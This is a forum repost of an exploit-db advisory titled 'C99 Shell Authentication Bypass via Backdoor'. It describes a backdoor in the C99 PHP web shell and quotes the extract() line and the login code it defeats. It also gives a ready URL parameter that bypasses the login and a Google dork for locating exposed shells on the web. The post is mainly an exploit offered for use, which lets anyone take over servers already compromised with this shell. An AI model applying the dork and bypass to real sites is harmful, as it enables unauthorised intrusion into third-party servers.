Jump to content
Usr6

C99 Shell Authentication Bypass via Backdoor

By Usr6, in Exploituri

Recommended Posts

Usr6 Newbie

Usr6

Posted
Posted 


# Exploit Title: C99 Shell Authentication Bypass via Backdoor
# Google Dork: inurl:c99.php
# Date: June 23, 2014
# Exploit Author: mandatory ( Matthew Bryant )
# Vendor Homepage: http://ccteam.ru/
# Software Link: https://www.google.com/
# Version: < 1.00 beta
# Tested on:Linux 
# CVE: N/A

All C99.php shells are backdoored. To bypass authentication add "?c99shcook[login]=0" to the URL. 

e.g. http://127.0.0.1/c99.php?c99shcook[login]=0

The backdoor:
  @extract($_REQUEST["c99shcook"]);

Which bypasses the authentication here:
if ($login) {
    if (empty($md5_pass)) {
        $md5_pass = md5($pass);
    }
    if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
        if ($login_txt === false) {
            $login_txt = "";
        } elseif (empty($login_txt)) {
            $login_txt = strip_tags(ereg_replace(" |<br>", " ", $donated_html));
        }
        header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\"");
        header("HTTP/1.0 401 Unauthorized");
        exit($accessdeniedmess);
    }
}

For more info: [[url]http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/[/url]

~mandatory

Sursa: http://www.exploit-db.com/exploits/34025/

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...